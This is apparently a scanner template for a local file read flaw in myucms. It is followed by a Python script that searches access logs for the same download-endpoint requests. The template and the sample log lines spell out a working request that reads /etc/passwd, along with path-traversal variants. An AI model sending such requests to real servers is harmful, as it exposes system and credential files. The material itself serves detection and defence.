Vulnerability Description
myucms has a local file read vulnerability. An attacker can exploit it to read arbitrary files on the server.
id: myucms-lfr
info:
  name: myucms lfr
  author: jinqi
  severity: high
  description: |-
    myucms 存在本地文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件
  tags: myucms,lfr
  created: 2025/03/27
rules:
  r0:
    request:
      method: GET
      path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
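
For defenders, the request shape in the rule above can be searched for in web server access logs. The following is an added example, not part of the original rule or of myucms: it flags requests to the download endpoint whose `url` parameter resolves outside an allowed directory. `ALLOWED_PREFIX`, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/index.php/bbs/index/download"  # endpoint taken from the rule above
ALLOWED_PREFIX = "/uploads/"  # assumption: directory legitimate downloads are served from

# Request and status fields of a combined-format access log line.
REQ_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(target):
    """True if the download endpoint is asked for a path outside ALLOWED_PREFIX."""
    parts = urlsplit(target)
    if parts.path.rstrip("/").lower() != ENDPOINT:
        return False
    for raw in parse_qs(parts.query).get("url", []):
        path = fully_decode(raw).replace("\\", "/")
        if not path:
            continue
        # Collapse "." and ".." segments before comparing against the allowed prefix.
        normalized = posixpath.normpath("/" + path.lstrip("/"))
        if not normalized.startswith(ALLOWED_PREFIX):
            return True
    return False

def scan(lines):
    """Return (status, target) for every suspicious request in the log lines."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if m and is_suspicious(m.group("target")):
            hits.append((int(m.group("status")), m.group("target")))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Mar/2025:10:00:01 +0000] "GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1" 200 1432',
    '203.0.113.5 - - [27/Mar/2025:10:00:02 +0000] "GET /index.php/bbs/index/download?url=/uploads/../../etc/passwd&name=a&local=1 HTTP/1.1" 200 1432',
    '198.51.100.7 - - [27/Mar/2025:10:05:00 +0000] "GET /index.php/bbs/index/download?url=/uploads/2025/report.zip&name=report.zip&local=1 HTTP/1.1" 200 88211',
    '198.51.100.7 - - [27/Mar/2025:10:05:03 +0000] "GET /index.php/bbs/index/index HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for status, target in scan(SAMPLE_LOG):
        print(status, target)
```

A hit with status 200 means the server returned a response body for that path, so those requests are the ones to triage first.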